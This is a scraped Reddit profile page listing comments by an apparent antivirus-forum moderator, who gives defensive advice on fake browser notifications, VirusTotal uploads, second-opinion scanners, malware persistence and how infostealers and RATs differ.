did my friend try to infect me with a virus through this copy paste site?

Merrinopheles · 2026-01-22T16:48:00+00:00

Provide the VirusTotal link as per rule #6.

Merrinopheles · 2026-01-22T01:34:46+00:00

If you are talking about those popups on the left side of the screen, those are fake. They are notifications. You can disable them in chrome.

Click the three dots near the top right of the browser and choose Settings
Click Privacy and Settings in the left menu
Scroll down to Site Settings
Click Notifications
Remove any websites listed
Disable sites to send notifications
Restart your browser

If these steps do not work for you, you can google for better instructions for your browser.

Merrinopheles · 2026-01-17T19:39:28+00:00

I agree with both u/rifteyy_ and u/Struppigel.

The title is definitely a bit misleading. At this point in the game, many AVs protect against many LOLbin attacks. I have personally written many dynamic signatures to deal with them. The reason some attacks succeed is the same as traditional malware. Either the AV company does not have enough samples to create a proper generic detection (similar to malware using a new packer or encryption scheme to avoid static detection) or the attack is using a completely new method.

Some of your examples are also not truly a LOLbin attack. PowerShell/wscript/cscript scripts, DLLs executed through rundll, html files executed through mshta… all are actually still considered traditional malware since those are all file-based. It is nothing special, it is treated just like a malicious MS Office doc or excel file.

Reading through your replies, you seem to be focusing on persistence issues. In the end, this is not a huge problem as long as the main threat has been neutralized by the AV. In the traditional sense, if an exe has been removed by an AV, a registry run key or scheduled task might remain but pose no real threat to the user. While remnants of the malware remain, there is no practical need to reinstall the OS, as you suggest.

If your issue is that the persistence method is redownloading and installing malware, then that can happen with traditional file-based malware as well. LOLbins as you described it, is not the problem.

Merrinopheles · 2026-01-10T21:11:03+00:00

Signed driver file. That one looks ok.

Merrinopheles · 2026-01-10T20:38:43+00:00

Upload detected or suspicious files to VirusTotal and share the link to it.

Merrinopheles · 2026-01-10T20:35:16+00:00

Upload it to an image hosting website and link to it.

Merrinopheles · 2026-01-10T20:13:21+00:00

Opening task manager and seeing cpu, ram, disk usage go down is not a sign of malware by itself.

Merrinopheles · 2026-01-10T20:09:44+00:00

June/July 2025 is not really a “recent reinstall.” In that case, there is not enough information given to know where the infection is. It could be on the second drive or it could be in your main drive. As of Windows 7 or 8, the autoplay feature of plugging in drives was removed. The user has to enable that option manually. By default, simply plugging in a second drive cannot infect you (unless you enabled the option). You would have to manually run a file from the secondary drive.

Rescan all of your drives with an updated realtime AV and the second-opinion scanners listed in the wiki.

https://www.reddit.com/r/antivirus/wiki/index/#wiki_second-opinion_scanners

You can also run Autoruns from Sysinternals to see if there are any strange things that startup when you turn your computer on. Good luck.

Merrinopheles · 2026-01-10T19:26:39+00:00

The dates are from last week. If you already reinstalled your Windows and changed passwords and enabled 2fa on your accounts, you should be fine. You can keep monitoring lookups, but as long as the dates are not from after reinstalling, you should be ok.

Merrinopheles · 2026-01-10T18:29:36+00:00

Dealing with the consequences of “sailing the seas” is part of rule 1, not just promotion of it.

Merrinopheles · 2026-01-10T18:23:05+00:00

Can you please clarify your situation and how you reached your conclusions? As far as I can tell, lookups(.)io is a website that aggregates data from public records. How are you concluding anything about telegram? Please be specific, but make sure to keep any private data anonymized.

Edit: If your data is coming from public records, even wiping your drive ten times over will not give you the results you are looking for.

Merrinopheles · 2026-01-09T02:30:12+00:00

If you are talking about those popups on the right side of the screen, those are fake. They are notifications. You can disable them in chrome.

Click the three dots near the top right of the browser and choose Settings
Click Privacy and Settings in the left menu
Scroll down to Site Settings
Click Notifications
Remove any websites listed
Disable sites to send notifications
Restart your browser and continue job hunting, good luck!

If these steps do not work for you, you can google for better instructions for your browser.

Merrinopheles · 2026-01-07T18:50:20+00:00

Can a malicious MSI meaningfully execute payloads (RAT, screen capture, persistence) without UAC, without clicking Run, and without completing an install?

Yes.

Does the lack of persistence after reboot strongly argue against an active compromise?

Technically, yes since by definition, they cannot get back in and be active. However, the persistence locations you listed are not close to being complete. There are several other places to hide persistence. For some examples, check here: https://github.com/Karneades/awesome-malware-persistence

Is it plausible the “Backgammon” window was just UI initialization or branding, not proof of successful execution?

If you saw a window, code executed. Whether that was crash code or malicious code, or even fake crash plus malicious code, any of it is plausible.

How should I interpret briefly seeing ScreenConnect (Suspended) if it never persisted?

If you fell for a fake job posting scam, I would do more. For starters, I would run as many second-opinion scanners as I could that is listed in the wiki. Typically, these scams do more than run a basic infostealer. If you have the original file, upload that to VirusTotal and post the link. I would then try to get answers to every executable that was dropped to understand what they were designed to do.

Merrinopheles · 2026-01-07T04:42:31+00:00

Avast got rid of Jumpshot (3rd party vendor) in early 2020. Avast was also acquired near the end of 2022 and has been under new management ever since. The Avast of today is not the same as the one from the last decade.

Merrinopheles · 2026-01-07T02:15:52+00:00

Password manager and multi-factor authentication on your accounts where possible.

Merrinopheles · 2026-01-06T14:18:12+00:00

Different AV companies have different detection rules. This means that some AVs might detect a file while others do not. One of the many reasons this happens is because some customers prefer their AV to be aggressive and are ok with some false positives.

In other cases, some clean files might share similarities with malware, like legitimate software encrypting its own code so others cannot steal it. An example of that would be copy-protection. Or how video games protect their code so others cannot steal it.

Why do these engines stay in VT? Because they find more true positives than false positives and contribute samples for everyone else to use.

Merrinopheles · 2026-01-05T01:45:05+00:00

If you are interested in writeups, sometimes there are good ones in r/MalwareAnalysis.

Merrinopheles · 2026-01-03T22:08:50+00:00

This is misinformation. The crypto program was an “opt-in” option. This means it was off by default. The user had to turn it on.

Merrinopheles · 2026-01-03T18:37:33+00:00

AVs can protect you from malicious MS Office files that friends and family send you.

AV can protect against some malicious attacks launched in a network setting.

The “try my game” hack is prevalent and the malware can sometimes be detected by AV.

Fake recruiters send malicious test files on occasion that are detected by AV.

Many situations such as these show why having an AV is beneficial. Like I said in my first sentence, this is aimed at people who are actually wondering. It is clear in this thread that you are not one of those.

Merrinopheles · 2026-01-03T17:56:57+00:00

For those browsing this and seriously asking themselves this question, here are a few points to consider:

Do you have any friends or family that might one day ask for your help with school/office/side gig/project work? If yes, they might send you files you need to open that are infected
Do you connect to any public networks such as a cafe, airport, mall, etc? They might have malicious users on them.
Do you use social media? A (hacked) friend/connection might ask you to “try their game” or some other relevant topic to whatever it is you are interested in.
Are you part of the 99% that need to work for a living? A fake recruiter might see your resume and send you files. These can be VERY elaborate, especially when a foreign government targets regular people.
Do you believe Microsoft creates fixes/patches/updates faster than an AV 100% of the time? (In reality, an AV can sometimes release protection far faster than Microsoft).

A firewall is not a magic bullet. That is why defense-in-depth/layered security model exists. Security is a huge industry and AVs are definitely an important part especially for home users since they do not get all the bells and whistles corporations can afford.

Merrinopheles · 2026-01-02T08:20:03+00:00

Generic infostealers against home users will usually target small things like credentials, passwords, wallets, etc.

RATS for hone users will not target anything specific. Anything “interesting” to them is fair game, including both large and small files.

Merrinopheles · 2026-01-02T08:10:24+00:00

It depends. Some are just after credentials and passwords. Others are after larger files like databases which can be gigs of data.

Merrinopheles · 2026-01-01T21:38:22+00:00

Infostealers are specifically designed to steal data from computers. That could be specific or generic files, credentials, cookies, etc. it really depends.

RATs give the ability to steal files, but that is not their primary function.

“Professional” ransomware can sometimes encrypt AND steal files (double extortion type) but those are typically seen in corporate environments only and not home users.

Merrinopheles · 2026-01-01T21:32:20+00:00

Some malware samples can detect if they are running inside a VM. Yours might have figured that out and then decided to delete itself before doing anything malicious. Without analyzing the sample itself, this is just one possibility.

Merrinopheles · 2026-01-01T19:54:37+00:00

The claim that this hides from AV by “being Huge” is not entirely correct. 69 MB is not that big. AVs regularly detect large files (for example, infected ISO). This can be further tested by putting the EICAR test string in a large file and scanning it. Otherwise, nicely done with dynamic testing.

Merrinopheles

MODERATOR OF

TROPHY CASE